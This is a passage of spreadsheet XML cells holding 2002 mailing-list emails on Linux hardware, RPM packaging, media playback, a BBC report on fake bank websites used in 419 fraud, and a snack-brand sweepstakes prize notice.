    <t>Actually, I'd be more inclined to look into: [URL]http://www.theregister.co.uk[/URL] Avoiding giving any cash to a certain corporation  P &gt; -----Original Message----- &gt; &gt;I'd normally never buy this but the Xbox is Eur300 on IOL's shop, a very &gt; &gt;large company are making a loss on it and: &gt; &gt; &gt; &gt;[URL]http://xbox-linux.sourceforge.net[/URL]âŠ‚=Press%20Release% &gt; 3A%20Xbox%20Linux%20Mandrake%209%20Released &gt; &gt; &gt; &gt;Mandrake has been released for it. &gt;  &gt; isn't it 250 in Smyths? &gt;  &gt; don't forget to add to that the modchip, and the time to put it on. &gt;  &gt; (/me thinks unless you want 3d graphics, [URL]www.mini-itx.com[/URL] is the way to go &gt; :)) &gt;  --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.theregister.co.uk http://xbox-linux.sourceforge.net www.mini-itx.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Tue, 8 Oct 2002 13:53:58 -0700</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 13:53:58 -0700</t>
  </si>
  <si>
    <t>Origins of Software Engineering</t>
  </si>
  <si>
    <t>The academic discipline of Software Engineering was launched at a conference\nsponsored by NATO, at Garmisch, Germany, in October, 1968. Intriguingly, the\nterm Software Engineering was chosen to be deliberately provocative -- why\ncan't software be developed with the same rigor used by other engineering\ndisciplines?\n\nThe proceedings of this conference are now available online, at:\n[URL]http://www.cs.ncl.ac.uk[/URL]\n\nAlso, don't miss the pictures of attendees, including many significant\ncontributors to the field of Software Engineering:\n[URL]http://www.cs.ncl.ac.uk[/URL]\nx.html\n\n- Jim</t>
  </si>
  <si>
    <t>http://www.cs.ncl.ac.uk http://www.cs.ncl.ac.uk</t>
  </si>
  <si>
    <t>To: Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Liam Bedford &lt;lbedford@lbedford.org&gt;\nDate: Tue, 8 Oct 2002 12:12:59 +0100</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 12:12:59 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] cheap linux PCs</t>
  </si>
  <si>
    <t>&gt;I'd normally never buy this but the Xbox is Eur300 on IOL's shop, a very\n&gt;large company are making a loss on it and:\n&gt;\n&gt;[URL]http://xbox-linux.sourceforge.net[/URL]\n&gt;\n&gt;Mandrake has been released for it.\n\nisn't it 250 in Smyths?\n\ndon't forget to add to that the modchip, and the time to put it on.\n\n(/me thinks unless you want 3d graphics, [URL]www.mini-itx.com[/URL] is the way to go :))\n\nL.\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://xbox-linux.sourceforge.net www.mini-itx.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "'ILUG'" &lt;ilug@linux.ie&gt;\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Tue, 8 Oct 2002 12:06:33 -0700</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 12:06:33 -0700</t>
  </si>
  <si>
    <t>"'ILUG'" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Modem question</t>
  </si>
  <si>
    <t>Quoting Breathnach, Proinnsias (Dublin) (breatpro@exchange.ie.ml.com):\n\n&gt; Is there any reliable way to calculate your connection speed if you don't\n&gt; trust what the modem reports?\n\nDo a wget of a file of known length, in a script that runs "date" before\nand after (or equivalent).\n\nBe aware that speed between you and your upstream link is one thing;\nspeed through countless congested routers to a faraway location may be\nquite another.  Remember that hardware-level compression is a factor.\n(The file you wget will probably be precompressed.)\n\nIn the area of the slightly more exotic, be aware that different traffic\nmay have higher priority and thus more available bandwidth at various\npoints in the transit to/from you -- and that some traffic may go via \ndifferent paths coming vs. going.\n\nBe aware that raw bulk transfer speed may not be the only thing that\nmatters:  Depending on what you're doing, the modem's connection latency\nmight matter, and this differs widely between modems.  (It matters more\nfor interactive sessions, e.g., ssh remote logins, where each keystroke\nis echoed from remote.)\n\n-- \nCheers,                    "Send a policeman, and have it arrested."\nRick Moen                     -- Otto von Bismarck, when asked what he \nrick@linuxmafia.com               would do if the British Army landed.\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Tue, 8 Oct 2002 12:03:55 +0100</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 12:03:55 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Fake bank website cons victims</t>
  </si>
  <si>
    <t>&gt;&gt;From the BBC website - [URL]www.bbc.co.uk[/URL]\n\n Tuesday, 8 October, 2002, 09:43 GMT 10:43 UK \n\n Fake bank website cons victims\n \n West African criminals have used a fake version of a British bank's online\n service to milk victims of cash, say police. The fake site was used to squeeze\n more money out of people they had already hooked. \n \n The site has been shut down. But UK National Criminal Intelligence Service,\n (NCIS), said at least two Canadians had lost more than $100,000 after being\n taken in by the fake website. \n \n The scam behind the fake web domain was the familiar one that offers people a\n share of the huge sums of money they need moved out of various African\n nations. \n \n NCIS said the use of the web was helping the conmen hook victims that would\n otherwise spot the scam. \n \n Convincing site \n \n News of this latest scam was revealed by BBC Radio5Live. It found that an\n unclaimed web domain of a UK bank had been used by conmen to get more cash out\n their victims. \n\n A NCIS spokesman said the domain looked legitimate because it had "the" in\n front of the bank's name. \n \n "I have seen the microsite myself and it's very sophisticated," said the NCIS\n spokesman. "It's very convincing especially to people not very experienced\n online." \n \n Once the con was discovered it was quickly shut down. However, the people\n behind it have not been caught. \n \n NCIS does know that at least two people have lost more than $100,000. \n \n The bank involved has bought up the domain used in the con as well as many\n other permutations of its name to limit the chance it could happen again. \n\n Domain games \n \n Usually people are first hooked in to what has become known as Advanced Fee or\n 419 fraud by replying to an unsolicited fax or e-mail offering a share of any\n cash successfully moved out of Africa. \n \n The '419' refers to the part of the Nigerian penal code dealing with such\n crimes. \n \n Like any con, there is no money to be moved at all and instead anyone taking\n the bait is asked to pay increasingly large sums to supposedly bribe\n uncooperative officials and to smooth the passage of the cash. \n \n Although this con has been practiced for years, people still fall victim to\n it. \n \n NCIS estimates that up to five Americans are sitting in hotel lobbies in\n London everyday waiting to meet people connected with this con. \n \n Cutting edge fraud \n \n Often the conmen provide fake banking certificates to give the con an air of\n legitimacy. \n \n \n People tricked into clicking on fake sites\n \n But a spokesman for NCIS said fake or spoof websites are now being used in\n place of the certificates. \n \n "To many people nowadays the cutting edge of banking technology is web\n technology," said the spokesman. \n \n One of the first groups of conmen to use this method set up a fake website\n that supposedly gave victims access to accounts held at the South African\n Reserve Bank, the country's national bank. \n \n Typically, victims are given a login name and password and are encouraged to\n visit the site so they can see that the cash they are getting a share of has\n been deposited in their name. \n \n But before they can get their hands on the cash, the victims are typically\n asked to hand over more of their own money to help the transfer go ahead. \n \n Once the South African police discovered the ruse they declared it a national\n priority crime and soon arrested the 18 people behind it. \n \n Modern gloss \n \n An briefing paper prepared by NCIS in August on organised crime noted that\n criminals were increasingly turning to the web to lure new victims and give\n old cons a modern gloss. \n \n The NCIS spokesman urged people who have fallen victim to 419 fraud to come\n forward and help it track down the perpetrators. He said in the last two\n months it had arrested 24 people overseas involved with this type of fraud. \n \n He said any e-mail, fax or letter making an offer that looks to good too be\n true, undoubtedly is. \n \n One of the first companies to fall victim to website spoofing was net payment\n service Paypal. \n \n Conmen set up a fake site and asked people to visit and re-enter their account\n and credit card details because Paypal had lost the information. \n \n The website link included in the e-mail looked legitimate but in fact directed\n people to a fake domain that gathered details for the conmen's personal use. \n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nSell a Home for Top $\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>www.bbc.co.uk http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Panu Matilainen &lt;pmatilai@welho.com&gt;\nDate: Tue, 8 Oct 2002 11:48:01 +0300 (EEST)</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 11:48:01 +0300 (EEST)</t>
  </si>
  <si>
    <t>Re: RH 8 no DMA for DVD drive</t>
  </si>
  <si>
    <t>On Mon, 7 Oct 2002, Jesse Keating wrote: &gt; On Mon, 7 Oct 2002 19:28:51 +0200 &gt; Matthias Saou  wrote: &gt;  &gt; # I've never heard of any CD-ROM or DVD-ROM drive having problems with &gt; # DMA... although there probably is since Red Hat decided to default &gt; # disabling it a few releases back :-/ &gt;  &gt; When I worked as a PC repair tech for a Computer store chain, I did &gt; run across quite a few DVD drives that would lock up if DMA was &gt; enabled.  It's more of a chipset/drive problem than a Drive by itself. And my IBM Intellistation would lock up instantly .. now this is actually  quite funny .. if DMA was enabled for the CD-ROM *and* you tried to access  a CD with Joliet extensions. Otherwise it worked just fine with DMA  enabled :) --  	- Panu - _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Panu Matilainen &lt;pmatilai@welho.com&gt;\nDate: Tue, 8 Oct 2002 11:43:09 +0300 (EEST)</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 11:43:09 +0300 (EEST)</t>
  </si>
  <si>
    <t>Re: a problem with apt-get</t>
  </si>
  <si>
    <t>On Mon, 7 Oct 2002, Thomas Vander Stichele wrote: &gt; Hi, &gt;  &gt; In my build scripts, I have problems with some of the kernel packages. &gt;  &gt; For kernel-sources, I get : &gt;  &gt; Package kernel-source is a virtual package provided by: &gt;   kernel-source#2.4.18-3 2.4.18-3 &gt;   kernel-source#2.4.18-3 2.4.18-3 &gt;  &gt; on running apt-get install kernel-source &gt;  &gt; Now, first of all, this doesn't really tell me what the two options are ;) &gt; Second, is there some way I can tell apt-get to install either ? This is  &gt; done from automatic build scripts so I'd like it to proceed anyway. That's just apt's way of telling you the package is in "AllowDuplicated",  meaning multiple versions of the package can be installed at the same  time. Yes the output is a bit strange.. especially when there's only one  version available. 'apt-get install kernel-source#2.4.18-3' will install it... --  	- Panu - _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;aj.mckee@nmtbmedia.com&gt;, &lt;webdev@linux.ie&gt;\nFrom: Donncha O Caoimh &lt;donncha.ocaoimh@tradesignals.com&gt;\nDate: Tue, 8 Oct 2002 11:42:39 +0100</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 11:42:39 +0100</t>
  </si>
  <si>
    <t>Donncha O Caoimh &lt;donncha.ocaoimh@tradesignals.com&gt;</t>
  </si>
  <si>
    <t>&lt;aj.mckee@nmtbmedia.com&gt;, &lt;webdev@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [Webdev] mod_usertrack</t>
  </si>
  <si>
    <t>Thanks for the info AJ, I found "weblog" at \n[URL]http://awsd.com[/URL] which has some click-path \nreporting. It's simple, but works. Report generation takes a bit though, even \nwith dns resolution turned off..\n\nDonncha.\n\n\nOn Monday 07 October 2002 23:35, AJ McKee wrote:\n&gt; Donncha,\n&gt;\n&gt; I've been using mod_usertrack for a good while now. I use in by default in\n&gt; every vhost that I set up. I assign a cookie name and set the expiry for\n&gt; about a year. I have to say it looks ok. A few things to note though. If a\n_______________________________________________\nWebdev mailing list\nWebdev@linux.ie\n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>http://awsd.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Tue, 8 Oct 2002 09:43:34 +0200</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 09:43:34 +0200</t>
  </si>
  <si>
    <t>Re: xmms and .mp3 files.</t>
  </si>
  <si>
    <t>Once upon a time, Roi wrote : &gt; oh xmms didn't work for me also &gt; i used mpg123 i tought its something from me Nope, this is "normal" as Red Hat removed all mp3 support from 8.0 because of patent and royalty issues :-( On freshrpms.net, you can find the xmms mp3 plugin as I said, but also libmad, lame (mp3 encoder), and soon mpg321 as I often used it myself. Many other players can also play mp3 files, like alsaplayer, xine, mplayer. &gt; like mplayer not working also and gives black screen This is not normal though... Try "mplayer -vo help" then try usinf various output methods to see if some do work or not. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.00 0.05 0.01 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Tue, 8 Oct 2002 09:37:21 +0200</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 09:37:21 +0200</t>
  </si>
  <si>
    <t>Re: xine src packge still gives errors</t>
  </si>
  <si>
    <t>Once upon a time, Roi wrote : &gt; RPM build errors: &gt;     user dude does not exist - using root &gt;     user dude does not exist - using root &gt;     user dude does not exist - using root &gt;     user dude does not exist - using root &gt;     user dude does not exist - using root This I would guess is normal, but don't you get it at the very beginning of the build? Isn't this at the end just a reminder? &gt;     File not found: /var/tmp/xine-root/usr/bin/aaxine Argh, I forgot to exclude aaxine from the %files when using "--without aalib" :-( The current "fr6.1" spec file fixes this... Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.02 0.03 0.00 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: fort@yahoogroups.com, zzzzteana@yahoogroups.com\nFrom: Tom Ritchford &lt;tom@swirly.com&gt;\nDate: Tue, 8 Oct 2002 09:24:39 -0400</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 09:24:39 -0400</t>
  </si>
  <si>
    <t>Tom Ritchford &lt;tom@swirly.com&gt;</t>
  </si>
  <si>
    <t>fort@yahoogroups.com, zzzzteana@yahoogroups.com</t>
  </si>
  <si>
    <t>[zzzzteana] Pravda reports cities on the moon!</t>
  </si>
  <si>
    <t>From: Steve Speer\nSubject: [URL]http://english.pravda.ru[/URL]\n\n[not sure what the rules for crossposting between the two groups is...\n  my reasoning is that it's a major newspaper reporting evidence of\n  alien life so.... /t]\n-- \n\n[URL]http://loopNY.com[/URL] ......................An "open loop": shows every Saturday!\n[URL]http://extremeNY.com[/URL] .......................... submit to the calendar.\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nSell a Home with Ease!\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://english.pravda.ru http://loopNY.com http://extremeNY.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Tue, 8 Oct 2002 03:09:59 -0700</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 03:09:59 -0700</t>
  </si>
  <si>
    <t>Re: [ILUG] packaging risks and the reputation of linux distributions</t>
  </si>
  <si>
    <t>Quoting Brendan Kehoe (brendan@zen.org):\n\n&gt; As a workaround, the various distributions could use a GPG singature\n&gt; to verify correctness of the file.  Since the distributor's secret key\n&gt; is required to create that signature, it would add a pretty\n&gt; significant step that would have to be taken to make it possible to\n&gt; replace both a rpm or apt file and its accompanying signature.\n\nThere are complex problems inherent in attempts to implement this.\n[URL]http://linuxmafia.com[/URL]\n\n-- \nCheers,                        My pid is Inigo Montoya.  You kill -9    \nRick Moen                      my parent process.  Prepare to vi.\nrick@linuxmafia.com\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://linuxmafia.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;rod-3ds@arsecandle.org&gt;\nFrom: malcolm-sweeps@mrichi.com\nDate: Tue, 7 May 2002 9:38:27 -0600</t>
  </si>
  <si>
    <t>Tue, 7 May 2002 9:38:27 -0600</t>
  </si>
  <si>
    <t>malcolm-sweeps@mrichi.com</t>
  </si>
  <si>
    <t>&lt;rod-3ds@arsecandle.org&gt;</t>
  </si>
  <si>
    <t>Malcolm in the Middle Sweepstakes Prize Notification</t>
  </si>
  <si>
    <t>May 7, 2002\n\n\nDear rod-3ds@arsecandle.org:\n\n\nCongratulations!  On behalf of Frito-Lay, Inc., we are pleased to advise you\n that you've won Fourth Prize in the 3D's(R) Malcolm in the Middle(TM)\n Sweepstakes.   Fourth Prize consists of 1 manufacturer's coupon redeemable at\n participating retailers for 1 free bag of 3D's(R) brand snacks (up to 7 oz.\n size), with an approximate retail value of $2.59 and an expiration date of\n 12/31/02.\n\nFollow these instructions to claim your prize:\n\n1.	Print out this email message.\n\n2.	Complete ALL of the information requested.  Print clearly and legibly.  Sign\n where indicated.\n\n3.	If you are under 18 or otherwise under the legal age of majority in your\n state, your parent or legal guardian must co-sign where indicated below.\n\n4.	Mail the completed and signed form to:  3D's(R) Malcolm in the Middle(TM)\n Sweepstakes, Redemption Center, PO Box 1520, Elmhurst IL 60126.  WE MUST\n RECEIVE THIS FORM NO LATER THAN MAY 28, 2002 IN ORDER TO SEND YOU THE PRIZE.\n\nPLEASE DO NOT ATTEMPT TO REPLY TO THIS EMAIL.  THE ONLY WAY TO CLAIM THE PRIZE\n IS TO FOLLOW THE INSTRUCTIONS ABOVE.  YOUR PRIZE WILL BE MAILED TO YOU WITHIN 6\n TO 8 WEEKS OF RECEIPT OF THIS FORM.\n\nOnce again, on behalf of Frito-Lay, Inc., congratulations and thank you for\n participating in the Game.\n\n					\nSincerely,\n\n\nGame Security Services\n\n\n\n\n\n\n\n\n\n\nPRIZE ACCEPTANCE/RELEASE AND INDEMNIFICATION FORM\n3D's(R) Malcolm in the Middle(TM) Sweepstakes\n\n\n1.	My social security number is:  _______________________________\n\n2.	My date of birth is:   _______________________________________\n\n3.	My telephone number is:   __________________________________\n\n4.	My home address is:   _____________________________________\n\n			      _____________________________________\n\n5.	My email address is:   _____________________________________\n\n6.	I am a legal resident of the State of:   _________________________\n\n7.	I am above the legal age of majority in my state of residence or my parent or\n legal guardian has co-signed below.\n\n8.	I represent that I (1) have fully complied with all of the Official Rules of\n the Sweepstakes, and (2) have not committed any fraud or deception in\n participating in the Sweepstakes or in accepting the Prize.\n\n9.	By accepting the prize, I (and my parent/legal guardian if I am a minor)\n agree to release Frito-Lay, Inc. ("Sponsor"), FOX Broadcasting Company, 20th\n Century FOX Television, Regency Entertainment, their respective parent,\n subsidiary or affiliated companies, distributors, printing suppliers for this\n promotion, advertising, fulfillment, judging or promotion agencies,\n participating retailers, and all of their respective officers, directors,\n employees, representatives and agents from any liability for, and to hold them\n harmless against, any liability for injuries, losses or damages of any kind to\n persons or property resulting in whole or in part, directly or indirectly, from\n participation in the sweepstakes or acceptance, possession, misuse or use of\n any prize. \n\n\n\nName [print full name]:	_______________________________\n\nSignature:		_______________________________\n\nDate:			_______________________________\n\n\n\nIF WINNER IS A MINOR IN HIS OR HER STATE OF RESIDENCE, WINNER'S PARENT OR LEGAL\n GUARDIAN MUST COMPLETE THE INFORMATION BELOW: \n\nI am the parent or legal guardian of the winner who has signed the foregoing\n Release. I AGREE TO THE TERMS OF THE RELEASE AND CONSENT TO THE ACCEPTANCE OF\n THE PRIZE ON THE WINNER'S BEHALF.\n\n\n\nParent/Guardian's Name [print full name]:	_______________________________\n\nParent/Guardian's Signature:			_______________________________\n\nDate:						_______________________________\n\n\n\n\n\n\n\n2002 OFFICIAL RULES\n3D's(R) Malcolm in the Middle(TM) Sweepstakes\n\nOPEN ONLY TO LEGAL U.S. RESIDENTS LOCATED IN THE U.S. AT THE TIME OF ENTRY. VOID\n ELSEWHERE AND WHEREVER PROHIBITED BY LAW, INCLUDING BUT NOT LIMITED TO,\n FLORIDA, PUERTO RICO, U.S. VIRGIN ISLANDS AND U.S. MILITARY INSTALLATIONS\n LOCATED IN A FOREIGN COUNTRY.\n\nNO PURCHASE NECESSARY. PURCHASE DOES NOT IMPROVE CHANCE OF WINNING. MANY WILL\n ENTER. FEW WILL WIN. ODDS DEPEND ON NUMBER OF ENTRIES RECEIVED.\n\n1. ELIGIBILITY: Open only to legal U.S. residents located in the U.S. at the\n time of entry, excluding residents of Florida, Puerto Rico, the U.S. Virgin\n Islands and U.S. military installations located in a foreign country, who had\n online access on or before 1/26/02. Employees, contractors, directors and\n officers of Frito-Lay, Inc. ("Sponsor"), FOX Broadcasting Company, 20th Century\n FOX Television, Regency Entertainment, their respective parent, subsidiary and\n affiliated companies, distributors, printing suppliers for this promotion,\n advertising, fulfillment, judging and promotion agencies (collectively,\n "Promotion Parties"), and their immediate family members and those living in\n their same households are not eligible.\n\n2. TO ENTER: Beginning 12:00:01 a.m. E.T. 1/27/02, log on to [URL]www.3DsFun.com[/URL] and\n click on the link on the home page to locate the official entry form. Follow\n on-screen directions to properly complete an entry form and send it\n electronically by 11:59:59 p.m. E.T. 2/11/02. In order for entry to be valid,\n entrants must click on the "I accept" button on the web site. All entries must\n be received no later than 11:59:59 p.m. E.T. on 2/13/02. LIMIT ONE ENTRY PER\n PERSON AND/OR E-MAIL ADDRESS. SUBSEQUENT ENTRIES WILL BE DISQUALIFIED.\n Promotion Parties assume no responsibility for lost, late, misdirected, stolen,\n undelivered, garbled, damaged, or incomplete entries, or for any computer,\n online, telephone or technical malfunctions that may occur. Promotion Parties\n also assume no responsibility for any technical problems in connection with\n transmission or receipt of online entries including faulty electronic data\n transmission, traffic congestion on the Internet or on the web site, hardware\n or software error, equipment failure or malfunction, or other online\n communications problems. In the event of a dispute regarding the identity of\n the person submitting an online entry, entries will be declared made by the\n authorized account holder of the e-mail address submitted at the time of entry.\n "Authorized account holder" is defined as the natural person who is assigned to\n an e-mail address by an Internet Access provider, online service provider, or\n other organization (e.g., business, educational institution, etc.) responsible\n for assigning e-mail addresses for the domain associated with the submitted\n e-mail address. All entries become the property of Sponsor and will not be\n returned to entrant. Automated entries (including but not limited to entries\n made using any script, macro, bot, or sweepstakes service) and facsimiles are\n not allowed. Potential winner may be requested to provide Sponsor with proof\n that the potential winner is the authorized account holder of the e-mail\n address associated with the winning entry.\n\n3. WINNER SELECTION: Winners will be selected in a random drawing to take place\n on or about 2/28/02 by an independent judging organization, the judge, whose\n decisions are final and binding on all matters related to the sweepstakes. Odds\n of winning depend on the number of eligible entries received. Winners will be\n notified by e-mail. If any prize or correspondence (including e-mail) regarding\n any prize is returned as non-deliverable, prize may be forfeited and an\n alternate winner selected.  Winners (or winner's parent or legal guardian, if\n winner is a minor) and Grand Prize winner's travel companions (or companion's\n parent or legal guardian for any companion who is a minor) will be required to\n complete, sign and return either a Prize Acceptance/Release and Indemnification\n form or an Affidavit of Eligibility/Liability Release (as directed by Sponsor),\n and, where lawful, a Publicity Release within twenty-one (21) days of winners'\n receipt of documents via e-mail or prize may be forfeited. Grand prize winner\n (or winner's parent or legal guardian, if winner is a minor) and winner's\n travel companions will also be required to complete, sign and return a set\n visit release together with completed I-9 and W-4 forms in order to visit the\n set of Malcolm in the Middle(TM) as described below in paragraph 4. Prizes won\n by minors will be awarded to a parent or legal guardian who must sign all\n required documents.\n\n4. PRIZES: ONE (1) GRAND PRIZE: One trip for winner and 3 travel companions of\n winner's choosing to Los Angeles, CA to be completed on or before 12/31/02.\n Trip is for 4 persons but can include up to 8 persons under the following\n conditions: Among winner and the 3 selected travel companions, each traveler\n who is a minor in his/her state of residence must be accompanied by a parent or\n legal guardian of such minor at all times; Sponsor will provide trip\n accommodations for one parent or legal guardian to accompany him/her. Trip\n includes round-trip coach air transportation from a major gateway airport near\n winner's residence within the U.S.; 3 days/2 nights double occupancy standard\n hotel accommodations in the Los Angeles, CA metropolitan area (airport, carrier\n and hotel to be selected by Sponsor); accompanied admission to the set of FOX's\n Malcolm in the Middle(TM) ("MIM") during a non-filming period selected by FOX\n to meet Frankie Muniz; and ground transportation between the California airport\n and hotel, and between the hotel and the MIM set. Grand Prize winner will also\n receive a check for $2,500, 1 MIM script autographed by Frankie Muniz, one\n MIM/3D's(R) brand snacks VIP pack (including 1 backpack, 1 book, 1 hat, 1\n t-shirt, and 1 case consisting of fifteen 7 oz. bags of RUFFLES(R) 3D's(R)\n brand Maximum Cheddar flavored snacks). Approximate Retail Value ("ARV"):\n Between $7,500 and $15,000, depending on winner's point of travel origin and\n how many persons (up to 8) take the trip. All meals, gratuities, and other\n expenses associated with prize trip not specifically mentioned in these rules\n are the winner's sole responsibility. All travel must be taken by the date\n specified; no alternative travel dates are available. Winner, travel\n companions, and any necessary parent(s)/legal guardian(s) (the "travel party")\n must travel on same itinerary. In the event that circumstances prevent the\n travel party from being able to attend the set visit or meet Frankie Muniz, or\n limit this portion of the Grand Prize in any way, the winner agrees that the\n Promotion Parties shall have no obligations other than to deliver the remainder\n of the Grand Prize. FIVE (5) FIRST PRIZES: Manufacturer's coupons redeemable at\n participating retailers for 52 free 7 oz. bags of any 3D'S(R) brand snacks\n (with a retail value up to $2.59). ARV: $135. TEN (10) SECOND PRIZES: One\n MIM/3D's(R) brand snacks VIP pack (including 1 backpack, 1 book, 1 hat, ,1\n t-shirt, and 1 case consisting of fifteen 7 oz. bags of RUFFLES(R) 3D's(R)\n brand Maximum Cheddar flavored snacks). ARV: $100. TWENTY (20) THIRD PRIZES:\n One MIM t-shirt and one MIM hat. ARV: $30. 100 FOURTH PRIZES: One\n manufacturer's coupon redeemable at participating retailers for 1 free bag of\n 3D's(R) brand snacks (up to 7 oz. size). ARV: $2.59. Free product coupons\n expire and must be redeemed by 12/31/02. No substitution, cash redemptions or\n transfer of prizes is permitted except at Sponsor's sole discretion. If a prize\n cannot be awarded for any reason, Sponsor reserves the right to substitute any\n prize with another prize of equal or greater value. Any portion of a prize not\n accepted by a winner shall be forfeited. All prizes will be awarded.\n\n5. GENERAL CONDITIONS: Sweepstakes is not to be used in connection with any form\n of gambling. Prizes will be awarded and/or delivered only to addresses within\n the United States. Prize winners are solely responsible for any taxes on\n Prizes. This sweepstakes is subject to all federal, state and local laws, and\n Grand Prize winner will receive an IRS Form 1099 for the approximate retail\n value of the prize. By participating, entrants (and their parent(s)/legal\n guardian(s) if entrants are minors) agree to these Official Rules, Sponsor's\n Privacy Policy (available at [URL]www.3DsFun.com[/URL] and to the decisions of the judge,\n which are final and binding in all respects. If for any reason the sweepstakes\n is not capable of running as planned; including infection by computer virus,\n bugs, tampering, unauthorized intervention, fraud, technical failures, or any\n other causes which corrupt or affect the administration, security, fairness,\n integrity or proper conduct of the sweepstakes, Sponsor reserves the right, at\n its sole discretion, to disqualify any individual who is responsible or who\n tampers with the entry process, and to cancel or terminate the sweepstakes and\n select the winners from all eligible entries received prior to the cancellation\n or termination. This sweepstakes is offered only in the United States and is\n governed by the laws of the state of Texas, with venue in Dallas County, Texas,\n and all claims must be resolved in the federal or state courts of Dallas\n County, Texas.\n\n6. LIMITATIONS OF LIABILITY AND RELEASE: By accepting prize, winners (and\n winners' parent(s)/legal guardian(s) if winners are minors) agree that the\n Promotion Parties, participating retailers, and all of their respective\n officers, directors, employees, representatives and agents will have no\n liability whatsoever for, and shall be held harmless by winners against, any\n liability for injuries, losses or damages of any kind to persons or property\n resulting in whole or in part, directly or indirectly, from participation in\n the sweepstakes or acceptance, possession, misuse or use of any prize. Except\n if winners are residents of TN or where prohibited by law, winners (and\n winners' parent(s)/legal guardian(s) if winners are minors) grant (and agree to\n confirm this grant in writing, if requested) permission for Sponsor and those\n acting under its authority to use his/her name, photograph, voice and/or\n likeness, for advertising and/or publicity purposes without additional\n compensation.\n\n7. WINNERS' LIST: For a list of winners of prizes valued over $25, mail a\n self-addressed, stamped envelope to be postmarked by 2/11/02 and received by\n 2/18/02 to: Malcolm in the Middle(TM) Sweepstakes, Winners' List Requests, P.O.\n Box 1518, Elmhurst, IL 60126.\n\n8. SPONSOR: Frito-Lay, Inc., 7701 Legacy Drive, Plano, TX 75024-4099.\n\n(c)2002. Frito-Lay, Inc. All rights reserved.\n\nMalcolm in the Middle(TM) and (c)2002 Twentieth Century Fox Film Corporation,\n Regency Entertainment (USA) Inc. and Monarchy Enterprises S.a.r.l. All rights\n reserved.\n(c)2002. FOX BROADCASTING COMPANY</t>
  </si>
  <si>
    <t>www.3DsFun.com www.3DsFun.com</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Tue, 6 Aug 2002 23:54:09 -0400</t>
  </si>
  <si>
    <t>Tue, 6 Aug 2002 23:54:09 -0400</t>
  </si>
  <si>
    <t>[Razor-users] Razor report don't seem to be getting logged</t>
  </si>
  <si>
